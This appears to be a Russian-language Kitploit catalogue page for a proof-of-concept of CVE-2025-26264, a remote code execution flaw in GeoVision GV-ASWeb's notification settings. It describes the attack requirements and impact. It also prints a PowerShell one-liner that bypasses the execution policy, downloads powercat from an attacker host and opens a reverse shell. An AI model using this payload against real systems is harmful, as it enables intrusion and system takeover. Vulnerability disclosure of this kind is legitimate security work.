Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-26264 — CVE-2025-26264 — GeoVision GV-ASWeb версии 6.1.2.0 или ниже содержит уязвимость удалённого выполнения кода (RCE) в функции Notification Settings. Аутентифицированный злоумышленник с привилегиями «System Settings» в ASWeb может использовать эту ошибку для выполнения произвольных команд на сервере, что приводит к полной компрометации системы. | Kitploit
Инструменты/GitHubGitHub/hxlxmj/cve-2025-26264
Анализ уязвимостейЭксплуатацияЛатеральное перемещениеЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubhxlxmj/cve-2025-26264

CVE-2025-26264

Репозиторий
Сайт
171 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2025-26264 — GeoVision GV-ASWeb версии 6.1.2.0 или ниже содержит уязвимость удалённого выполнения кода (RCE) в функции Notification Settings. Аутентифицированный злоумышленник с привилегиями «System Settings» в ASWeb может использовать эту ошибку для выполнения произвольных команд на сервере, что приводит к полной компрометации системы.

Поделиться

CVE-2025-26264

CVE-2025-26264 — GeoVision GV-ASWeb версии 6.1.2.0 или ниже содержит уязвимость удалённого выполнения кода (RCE) в функции «Настройки уведомлений» (Notification Settings). Аутентифицированный злоумышленник с привилегиями «Системные настройки» в ASWeb может использовать эту уязвимость для выполнения произвольных команд на сервере, что приводит к полной компрометации системы.

Требования

Для успешной атаки злоумышленнику необходимы:

  • Сетевой доступ к веб-приложению GV-ASManager версии 6.1.2.0 или ниже;
  • Доступ к учётной записи с привилегией управления функцией Настройки уведомлений.

Воздействие

Уязвимость может быть использована для выполнения следующих несанкционированных действий:

  • Учётная запись с привилегией управления функцией Настройки уведомлений способна:
    • Выполнить атаку с удалённым выполнением кода.
  • После успешной атаки злоумышленник сможет:
    • Получить доступ, изменить или удалить конфиденциальную системную информацию;
    • Установить бэкдор в систему;
    • Провести атаку с использованием программ-вымогателей;
    • Осуществить горизонтальное перемещение во внутренней сети.

CVE-2025-26264 PoC [Тестирование GeoVision v6.1.2.0]

Эксплуатация уязвимости удалённого выполнения кода в платформе ASWeb GeoVision GV-ASManager возможна на версиях 6.1.2.0 или ниже (исправление отсутствует по состоянию на 26 февраля 2025 года).

Функция Notification Setting в ASWeb GeoVision ASManager уязвима к RCE

HTTP-запрос на настройку уведомления о конкретном событии: неудачная попытка входа в TAWeb

Согласно этому скрипту, при неудачной попытке входа в TAWeb будет выполнен следующий сценарий PowerShell:

powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell

Неудачная попытка аутентификации в TAWeb

Хост жертвы: скрипт открывает бэкдор на хост злоумышленника.

Хост злоумышленника: злоумышленник получает shell

Контакты

Если у вас есть вопрос, вы можете связаться со мной, Giorgi Dograshvili, в LinkedIn.

Скачать инструмент